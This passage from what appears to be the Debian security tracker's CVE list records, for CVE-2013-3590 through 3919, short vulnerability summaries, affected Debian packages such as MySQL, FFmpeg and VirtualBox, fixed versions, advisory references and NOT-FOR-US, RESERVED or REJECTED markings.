http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3810 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3809 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 (Only affects 5.5 and 5.6) - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3808 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2780-1} - mysql-5.5 5.5.31 - mysql-5.1 - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3807 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3806 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3805 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 5.5.31 - mysql-5.1 (Only affects Mysql 5.5 and 5.6) - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3804 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1 DSA-2780-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3803 (Unspecified vulnerability in the Hyperion BI+ component in Oracle Hype ...) NOT-FOR-US: Oracle Hyperion CVE-2013-3802 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1 DSA-2780-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3801 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 5.5.31 - mysql-5.1 (Only affects 5.5 and 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3800 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3799 (Unspecified vulnerability in Oracle Solaris 10 and 11, when running on ...) NOT-FOR-US: Oracle Solaris CVE-2013-3798 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3797 (Unspecified vulnerability in Oracle Solaris 11 allows local users to a ...) NOT-FOR-US: Oracle Solaris CVE-2013-3796 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3795 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects 5.5 and 5.6) - mysql-5.1 (Only affects 5.5 and 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3794 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 5.5.31 - mysql-5.1 (Only affects 5.5 and 5.6) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3793 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 (Only affects 5.5 and 5.6) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3792 (Unspecified vulnerability in the Oracle VM VirtualBox component in Ora ...) {DLA-313-1} - virtualbox-ose [squeeze] - virtualbox-ose (Minor issue) - virtualbox 4.2.16-dfsg-1 (bug #715327) [wheezy] - virtualbox 4.1.40-dfsg-1+deb7u1 NOTE: https://www.virtualbox.org/ticket/11863 NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html CVE-2013-3791 (Unspecified vulnerability in Enterprise Manager (EM) Base Platform 10. ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-3790 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-3789 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-3788 (Unspecified vulnerability in the Oracle iSupplier Portal component in ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3787 (Unspecified vulnerability in Oracle Solaris 10 and 11 allows remote at ...) NOT-FOR-US: Oracle Solaris CVE-2013-3786 (Unspecified vulnerability in Oracle Solaris 9, 10, and 11 allows local ...) NOT-FOR-US: Oracle Solaris CVE-2013-3785 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3784 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3783 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 (Only affects 5.5) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3782 (Unspecified vulnerability in the Secure Global Desktop component in Or ...) NOT-FOR-US: Oracle Virtualization CVE-2013-3781 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3780 (Unspecified vulnerability in the PeopleSoft Enterprise Portal componen ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3779 (Unspecified vulnerability in the Secure Global Desktop component in Or ...) NOT-FOR-US: Oracle Virtualization CVE-2013-3778 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3777 (Unspecified vulnerability in the Oracle Application Object Library com ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3776 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3775 (Unspecified vulnerability in the Oracle iLearning component in Oracle ...) NOT-FOR-US: Oracle iLearning CVE-2013-3774 (Unspecified vulnerability in the Network Layer component in Oracle Dat ...) NOT-FOR-US: Oracle Database Server CVE-2013-3773 (Unspecified vulnerability in the SPARC Enterprise M Series Servers com ...) NOT-FOR-US: Oracle and Sun Systems Products Suite CVE-2013-3772 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3771 (Unspecified vulnerability in the Oracle executable component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2013-3770 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3769 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3768 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3767 (Unspecified vulnerability in the Oracle Application Object Library com ...) NOT-FOR-US: Oracle E-Business Suite Access Gate CVE-2013-3766 (Unspecified vulnerability in the Primavera P6 Enterprise Project Portf ...) NOT-FOR-US: Oracle Primavera Products Suite CVE-2013-3765 (Unspecified vulnerability in Oracle Solaris 11 allows local users to a ...) NOT-FOR-US: Oracle Solaris CVE-2013-3764 (Unspecified vulnerability in the Oracle Endeca Server component in Ora ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3763 (Unspecified vulnerability in the Oracle Endeca Server component in Ora ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3762 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-3761 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products Portal CVE-2013-3760 (Unspecified vulnerability in the Oracle executable component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2013-3759 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3758 (Unspecified vulnerability in the Enterprise Manager (EM) Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-3757 (Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 allows re ...) NOT-FOR-US: Oracle Solaris CVE-2013-3756 (Unspecified vulnerability in the Oracle Landed Cost Management compone ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3755 (Unspecified vulnerability in the Oracle Access Manager component in Or ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3754 (Unspecified vulnerability in the Solaris Cluster component in Oracle a ...) NOT-FOR-US: Solaris CVE-2013-3753 (Unspecified vulnerability in Oracle Solaris 11 allows remote attackers ...) NOT-FOR-US: Oracle Solaris CVE-2013-3752 (Unspecified vulnerability in Oracle Solaris 11 allows remote attackers ...) NOT-FOR-US: Oracle Solaris CVE-2013-3751 (Unspecified vulnerability in the XML Parser component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-3750 (Unspecified vulnerability in Oracle Solaris 11 allows local users to a ...) NOT-FOR-US: Oracle Solaris CVE-2013-3749 (Unspecified vulnerability in the Oracle Application Object Library com ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3748 (Unspecified vulnerability in Oracle Solaris 11 allows remote attackers ...) NOT-FOR-US: Oracle Solaris CVE-2013-3747 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3746 (Unspecified vulnerability in the Solaris Cluster component in Oracle a ...) NOT-FOR-US: Solaris CVE-2013-3745 (Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 allows lo ...) NOT-FOR-US: Oracle Solaris CVE-2013-3744 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-3743 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected - openjdk-7 (Only affects Java 5 and Java 6) CVE-2013-3741 RESERVED CVE-2013-3740 RESERVED CVE-2013-3739 (Directory traversal vulnerability in editor.php in Network Weathermap ...) NOT-FOR-US: Network Weathermap CVE-2013-3738 (A File Inclusion vulnerability exists in Zabbix 2.0.6 due to inadequat ...) - zabbix 1:2.0.7+dfsg-1 NOTE: http://support.zabbix.com/browse/ZBX-6652 CVE-2013-3843 (Stack-based buffer overflow in the mk_request_header_process function ...) - monkey [squeeze] - monkey (Minor issue) CVE-2013-3919 (resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, a ...) - bind9 (vulnerable code not present) NOTE: https://kb.isc.org/article/AA-00967 CVE-2013-3742 (Cross-site scripting (XSS) vulnerability in view_create.php (aka the C ...) - phpmyadmin 4:4.0.1-3 (low) [wheezy] - phpmyadmin (Vulnerable code not present) [squeeze] - phpmyadmin (Vulnerable code not present) CVE-2013-3737 (The MobileUI (aka RT-Extension-MobileUI) extension before 1.04 in Requ ...) NOT-FOR-US: Request Tracker extension MobileUI CVE-2013-3736 (Cross-site scripting (XSS) vulnerability in the MobileUI (aka RT-Exten ...) NOT-FOR-US: Request Tracker extension MobileUI CVE-2013-3735 (** DISPUTED ** The Zend Engine in PHP before 5.4.16 RC1, and 5.5.0 bef ...) - php5 (unimportant) NOTE: exploitable by malicious scripts only CVE-2013-3734 (** DISPUTED ** The Embedded Jopr component in JBoss Application Server ...) NOT-FOR-US: Embedded Jopr CVE-2013-3733 RESERVED CVE-2013-3732 RESERVED CVE-2013-3731 RESERVED CVE-2013-3730 RESERVED CVE-2013-3729 (Multiple cross-site request forgery (CSRF) vulnerabilities in Kasseler ...) NOT-FOR-US: Kasseler CMS CVE-2013-3728 (Cross-site scripting (XSS) vulnerability in Kasseler CMS before 2 r123 ...) NOT-FOR-US: Kasseler CMS CVE-2013-3727 (SQL injection vulnerability in Kasseler CMS before 2 r1232 allows remo ...) NOT-FOR-US: Kasseler CMS CVE-2013-3726 REJECTED CVE-2013-3725 (Invision Power Board (IPB) through 3.x allows admin account takeover l ...) NOT-FOR-US: Invision Power Board CVE-2013-3724 (The mk_request_header_process function in mk_request.c in Monkey 1.1.1 ...) - monkey (low) [squeeze] - monkey (Minor issue) CVE-2013-3723 RESERVED CVE-2013-3722 (A Denial of Service (infinite loop) exists in OpenSIPS before 1.10 in ...) - opensips (Fixed before initial upload to Debian) NOTE: https://github.com/OpenSIPS/opensips/commit/54e027adfa486cfcf993828512b2e273aeb163c2 CVE-2013-3721 (SQL injection vulnerability in awards.php in PsychoStats 3.2.2b allows ...) NOT-FOR-US: PsychoStats CVE-2013-3720 (Cross-site scripting (XSS) vulnerability in widget_remove.php in the F ...) NOT-FOR-US: Wordpress plugin Feedweb CVE-2013-3719 (Cross-site scripting (XSS) vulnerability in the aiContactSafe componen ...) NOT-FOR-US: Joomla! CVE-2013-3718 (evince is missing a check on number of pages which can lead to a segme ...) - evince 3.10.0-1 [wheezy] - evince [squeeze] - evince (Vulnerable code not present) NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=701302 CVE-2013-3717 RESERVED CVE-2013-3716 RESERVED CVE-2013-3715 RESERVED CVE-2013-3714 RESERVED CVE-2013-3713 (The image creation configuration in aaa_base before 16.26.1 for openSU ...) NOT-FOR-US: openSUSE live installer CVE-2013-3712 (SUSE Studio Onsite 1.3.x before 1.3.6 and SUSE Studio Extension for Sy ...) NOT-FOR-US: SUSE Studio Onsite CVE-2013-3711 RESERVED CVE-2013-3710 (SUSE Lifecycle Management Server (SLMS) before 1.3.7 does not generate ...) NOT-FOR-US: SUSE Lifecycle Management Server CVE-2013-3709 (WebYaST 1.3 uses weak permissions for config/initializers/secret_token ...) NOT-FOR-US: WebYast CVE-2013-3708 (The id1.GetPrinterURLList function in Novell iPrint Client before 5.93 ...) NOT-FOR-US: Novell iPrint Client CVE-2013-3707 (The HTTPSTK service in the novell-nrm package before 2.0.2-297.305.302 ...) NOT-FOR-US: Novell Open Enterprise Server 2 CVE-2013-3706 (Directory traversal vulnerability in the PreBoot service in Novell ZEN ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-3705 (The VBA32 AntiRootKit component for Novell Client 2 SP3 before IR5 on ...) NOT-FOR-US: Novell Client CVE-2013-3704 (The RPM GPG key import and handling feature in libzypp 12.15.0 and ear ...) - libzypp (Fixed before initial upload) CVE-2013-3703 (The controller of the Open Build Service API prior to version 2.4.4 is ...) NOT-FOR-US: Open Build Service CVE-2013-3702 REJECTED CVE-2013-3701 REJECTED CVE-2013-3700 RESERVED CVE-2013-3699 REJECTED CVE-2013-3698 REJECTED CVE-2013-3697 (Integer overflow in the NWFS.SYS kernel driver 4.91.5.8 in Novell Clie ...) NOT-FOR-US: Novell Client on Windows CVE-2013-3696 RESERVED CVE-2013-3695 RESERVED CVE-2013-3694 (BlackBerry Link before 1.2.1.31 on Windows and before 1.1.1 build 39 o ...) NOT-FOR-US: BlackBerry Link CVE-2013-3693 (The BlackBerry Universal Device Service in BlackBerry Enterprise Servi ...) NOT-FOR-US: BlackBerry CVE-2013-3692 (BlackBerry 10 OS before 10.0.10.648 on BlackBerry Z10 smartphones uses ...) NOT-FOR-US: Blackberry OS CVE-2013-3691 (AirLive POE-2600HD allows remote attackers to cause a denial of servic ...) NOT-FOR-US: AirLive POE-2600HD CVE-2013-3690 (Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi i ...) NOT-FOR-US: Brickcom CVE-2013-3689 (Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, ...) NOT-FOR-US: Brickcom CVE-2013-3688 (The TP-Link IP Cameras TL-SC3171, TL-SC3130, TL-SC3130G, TL-SC3171G, a ...) NOT-FOR-US: TP-Link CVE-2013-3687 (AirLive POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, ...) NOT-FOR-US: AirLive cameras CVE-2013-3686 (cgi-bin/operator/param in AirLive WL2600CAM and possibly other camera ...) NOT-FOR-US: AirLive CVE-2013-3685 (A Privilege Escalation Vulnerability exists in Sprite Software Spriteb ...) NOT-FOR-US: Sprite Software's backup softare for Android CVE-2013-3684 (NextGEN Gallery plugin before 1.9.13 for WordPress: ngggallery.php fil ...) NOT-FOR-US: NextGEN Gallery plugin for WordPress CVE-2013-3683 RESERVED CVE-2013-3682 RESERVED CVE-2013-3681 RESERVED CVE-2013-3680 RESERVED CVE-2013-3679 RESERVED CVE-2013-3678 (Multiple unspecified vulnerabilities in SAP Governance, Risk, and Comp ...) NOT-FOR-US: SAP CVE-2013-3677 RESERVED CVE-2013-3676 RESERVED CVE-2013-3675 (The process_frame_obj function in sanm.c in libavcodec in FFmpeg befor ...) - ffmpeg (Smush codec not present in 0.5 ffmpeg) - libav (Smush codec not present in libav) CVE-2013-3674 (The cdg_decode_frame function in cdgraphics.c in libavcodec in FFmpeg ...) {DSA-3003-1} - ffmpeg (CD Graphics Video Decoder not present in 0.5 ffmpeg) - libav 6:10.4-1 NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commit;h=7ef2dbd2392e3e4d430e0173e1e5c4df9f18b6dd NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=a1599f3f7ea8478d1f6a95e59e3bc6bc86d5f812 CVE-2013-3673 (The gif_decode_frame function in gifdec.c in libavcodec in FFmpeg befo ...) - ffmpeg (Doesn't affect libav, specific to current ffmpeg) - libav (Doesn't affect libav, specific to current ffmpeg) CVE-2013-3672 (The mm_decode_inter function in mmvideo.c in libavcodec in FFmpeg befo ...) {DSA-3003-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10.4-1 NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commit;h=7fa6db2545643efb4fe2e0bb501fa50af35a6330 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=70cd3b8e659c3522eea5c16a65d14b8658894a94 CVE-2013-3671 (The format_line function in log.c in libavutil in FFmpeg before 1.2.1 ...) - ffmpeg (Doesn't affect libav, specific to current ffmpeg) - libav (Doesn't affect libav, specific to current ffmpeg) CVE-2013-3670 (The rle_unpack function in vmdav.c in libavcodec in FFmpeg git 2013032 ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10-1 [wheezy] - libav (Vulnerable code not present in 0.8) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commit;h=0baa0a5a02e16ef097ed9f72bc8a7d7b585c7652 NOTE: [Anton] not present in 0.8, 10 or master; possibly present in 9 CVE-2013-3669 RESERVED CVE-2013-3668 RESERVED CVE-2013-3667 (The software update mechanism as used in Bare Bones Software Yojimbo b ...) NOT-FOR-US: Various proprietary software updaters CVE-2013-3666 (The LG Hidden Menu component for Android on the LG Optimus G E973 allo ...) NOT-FOR-US: LG Hidden Menu CVE-2013-3665 (Unspecified vulnerability in Autodesk AutoCAD through 2014, AutoCAD LT ...) NOT-FOR-US: AutoCAD CVE-2013-3664 (Trimble SketchUp (formerly Google SketchUp) before 2013 (13.0.3689) al ...) NOT-FOR-US: Trimble SketchUp CVE-2013-3663 (Heap-based buffer overflow in paintlib, as used in Trimble SketchUp (f ...) NOT-FOR-US: Trimble SketchUp CVE-2013-3662 (Timbre SketchUp (formerly Google SketchUp) before 8 Maintenance 2 allo ...) NOT-FOR-US: Trimble SketchUp CVE-2013-3661 (The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP ...) NOT-FOR-US: Microsoft Windows CVE-2013-3660 (The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode ...) NOT-FOR-US: Microsoft Windows CVE-2013-3659 (The NTT DOCOMO overseas usage application 2.0.0 through 2.0.4 for Andr ...) NOT-FOR-US: Android application NTT DOCOMO CVE-2013-3658 (Directory traversal vulnerability in VMware ESXi 4.0 through 5.0, and ...) NOT-FOR-US: VMware CVE-2013-3657 (Buffer overflow in VMware ESXi 4.0 through 5.0, and ESX 4.0 and 4.1, a ...) NOT-FOR-US: VMware CVE-2013-3656 (Cybozu Office 9.1.0 and earlier does not properly manage sessions, whi ...) NOT-FOR-US: Cybozu Office CVE-2013-3655 (The Sharp AQUOS PhotoPlayer HN-PP150 with firmware before 1.04.00.04 a ...) NOT-FOR-US: Sharp AQUOS PhotoPlayer CVE-2013-3654 (Directory traversal vulnerability in LOCKON EC-CUBE 2.12.0 through 2.1 ...) NOT-FOR-US: EC-CUBE CVE-2013-3653 (Multiple cross-site scripting (XSS) vulnerabilities in the RecommendSe ...) NOT-FOR-US: EC-CUBE CVE-2013-3652 (Cross-site scripting (XSS) vulnerability in data/class/pages/products/ ...) NOT-FOR-US: EC-CUBE CVE-2013-3651 (LOCKON EC-CUBE 2.11.2 through 2.12.4 allows remote attackers to conduc ...) NOT-FOR-US: EC-CUBE CVE-2013-3650 (Directory traversal vulnerability in the lfCheckFileName function in d ...) NOT-FOR-US: EC-CUBE CVE-2013-3649 (Cross-site scripting (XSS) vulnerability in KENT-WEB CLIP-MAIL before ...) NOT-FOR-US: KENT-WEB CLIP-MAIL CVE-2013-3648 (Cross-site scripting (XSS) vulnerability in KENT-WEB POST-MAIL before ...) NOT-FOR-US: KENT-WEB POST-MAIL CVE-2013-3647 (The WebView class in the Cybozu Live application before 2.0.1 for Andr ...) NOT-FOR-US: Cybozu Live for Android CVE-2013-3646 (The Cybozu Live application before 2.0.1 for Android allows remote att ...) NOT-FOR-US: Cybozu Live for Android CVE-2013-3645 (Cross-site scripting (XSS) vulnerability in the Orchard.Comments modul ...) NOT-FOR-US: Orchard CVE-2013-3644 (Unspecified vulnerability in JustSystems Ichitaro 2006 through 2013; I ...) NOT-FOR-US: JustSystems Ichitaro CVE-2013-3643 (The Galapagos Browser application for Android does not properly implem ...) NOT-FOR-US: Galapagos Browser application for Android CVE-2013-3642 (The Angel Browser application 1.47b and earlier for Android 1.6 throug ...) NOT-FOR-US: Angel Browser application CVE-2013-3641 (The Pizza Hut Japan Official Order application before 1.1.1.a for Andr ...) NOT-FOR-US: The Pizza Hut Japan Official Order for Android CVE-2013-3640 (Cross-site scripting (XSS) vulnerability in the Instant Web Publish fu ...) NOT-FOR-US: FileMaker Pro CVE-2013-3639 (Multiple cross-site scripting (XSS) vulnerabilities in Xaraya 2.4.0-b1 ...) NOT-FOR-US: Xaraya CVE-2013-3638 (SQL injection vulnerability in Boonex Dolphin before 7.1.3 allows remo ...) NOT-FOR-US: Boonex Dolphin CVE-2013-3637 (ProjectPier 0.8.8 does not use the Secure flag for cookies ...) NOT-FOR-US: ProjectPier CVE-2013-3636 (ProjectPier 0.8.8 has a Remote Information Disclosure Weakness because ...) NOT-FOR-US: ProjectPier CVE-2013-3635 (ProjectPier 0.8.8 has stored XSS ...) NOT-FOR-US: ProjectPier CVE-2013-3634 (A vulnerability has been identified in SCALANCE X-200 switch family (i ...) NOT-FOR-US: Siemens switches CVE-2013-3633 (A vulnerability has been identified in SCALANCE X-200 switch family (i ...) NOT-FOR-US: Siemens CVE-2013-3632 (The Cron service in rpc.php in OpenMediaVault allows remote authentica ...) NOT-FOR-US: OpenMediaVault CVE-2013-3631 (NAS4Free 9.1.0.1.804 and earlier allows remote authenticated users to ...) NOT-FOR-US: NAS4Free CVE-2013-3630 (Moodle through 2.5.2 allows remote authenticated administrators to exe ...) NOTE: For Moodle: Not a securiy issue according to upstream, only applicable to administrators, see bug #775842 NOTE: https://tracker.moodle.org/browse/MDL-41449 NOTE: https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats CVE-2013-3629 (ISPConfig 3.0.5.2 has Arbitrary PHP Code Execution ...) NOT-FOR-US: ISPConfig CVE-2013-3628 (Zabbix 2.0.9 has an Arbitrary Command Execution Vulnerability ...) NOTE: Historic Zabbix issue CVE-2013-3627 (FrameworkService.exe in McAfee Framework Service in McAfee Managed Age ...) NOT-FOR-US: McAfee CVE-2013-3626 (Directory traversal vulnerability in the Session Server in Attachmate ...) NOT-FOR-US: Attachmate Verastream Host Integrator CVE-2013-3625 (An unspecified DLL file in Baramundi Management Suite 7.5 through 8.9 ...) NOT-FOR-US: Baramundi Management Suite CVE-2013-3624 (The OS deployment feature in Baramundi Management Suite 7.5 through 8. ...) NOT-FOR-US: Baramundi Management Suite CVE-2013-3623 (Multiple stack-based buffer overflows in cgi/close_window.cgi in the w ...) NOT-FOR-US: Intelligent Platform Management Interface CVE-2013-3622 (Buffer overflow in logout.cgi in the Intelligent Platform Management I ...) NOT-FOR-US: Intelligent Platform Management Interface CVE-2013-3621 REJECTED CVE-2013-3620 (Hardcoded WSMan credentials in Intelligent Platform Management Interfa ...) NOT-FOR-US: Supermicro CVE-2013-3619 (Intelligent Platform Management Interface (IPMI) with firmware for Sup ...) NOT-FOR-US: Supermicro CVE-2013-3618 RESERVED CVE-2013-3617 (The XML API in Openbravo ERP 2.5, 3.0, and earlier allows remote authe ...) NOT-FOR-US: Openbravo ERP CVE-2013-3616 (Cross-site scripting (XSS) vulnerability in the KnowledgeView Editoria ...) NOT-FOR-US: KnowledgeView Editorial and Management application CVE-2013-3615 (Dahua DVR appliances use a password-hash algorithm with a short hash l ...) NOT-FOR-US: Dahua DVR CVE-2013-3614 (Dahua DVR appliances have a small value for the maximum password lengt ...) NOT-FOR-US: Dahua DVR CVE-2013-3613 (Dahua DVR appliances do not properly restrict UPnP requests, which mak ...) NOT-FOR-US: Dahua DVR CVE-2013-3612 (Dahua DVR appliances have a hardcoded password for (1) the root accoun ...) NOT-FOR-US: Dahua DVR CVE-2013-3611 REJECTED CVE-2013-3610 (qis/QIS_finish.htm on the ASUS RT-N10E router with firmware before 2.0 ...) NOT-FOR-US: ASUS router CVE-2013-3609 (The web interface in the Intelligent Platform Management Interface (IP ...) NOT-FOR-US: Intelligent Platform Management Interface CVE-2013-3608 (The web interface in the Intelligent Platform Management Interface (IP ...) NOT-FOR-US: Intelligent Platform Management Interface CVE-2013-3607 (Multiple stack-based buffer overflows in the web interface in the Inte ...) NOT-FOR-US: Intelligent Platform Management Interface CVE-2013-3606 (The login page in the GoAhead web server on Dell PowerConnect 3348 1.2 ...) NOT-FOR-US: GoAhead web server on Dell PowerConnect CVE-2013-3605 (Cross-site request forgery (CSRF) vulnerability in Coursemill Learning ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3604 (Multiple cross-site scripting (XSS) vulnerabilities in Coursemill Lear ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3603 (Cross-site scripting (XSS) vulnerability in Coursemill Learning Manage ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3602 (SQL injection vulnerability in admindocumentworker.jsp in Coursemill L ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3601 (Coursemill Learning Management System (LMS) 6.6 does not properly rest ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3600 (Coursemill Learning Management System (LMS) 6.6 allows remote authenti ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3599 (userlogin.jsp in Coursemill Learning Management System (LMS) 6.6 and 6 ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-3598 (Directory traversal vulnerability in servlet/CreateTemplateServlet in ...) NOT-FOR-US: SearchBlox CVE-2013-3597 (servlet/CollectionListServlet in SearchBlox before 7.5 build 1 allows ...) NOT-FOR-US: SearchBlox CVE-2013-3596 (AdvancePro Advanceware allows remote authenticated users to obtain sen ...) NOT-FOR-US: AdvancePro Advanceware CVE-2013-3595 (The OpenManage web application 2.5 build 1.19 on Dell PowerConnect 334 ...) NOT-FOR-US: Dell PowerConnect CVE-2013-3594 (The SSH service on Dell PowerConnect 3348 1.2.1.3, 3524p 2.0.0.48, and ...) NOT-FOR-US: Dell PowerConnect CVE-2013-3593 (Baramundi Management Suite 7.5 through 8.9 uses cleartext for (1) clie ...) NOT-FOR-US: Baramundi Management Suite CVE-2013-3592 RESERVED CVE-2013-3591 (vTiger CRM 5.3 and 5.4: 'files' Upload Folder Arbitrary PHP Code Execu ...) NOT-FOR-US: vTiger CRM CVE-2013-3590 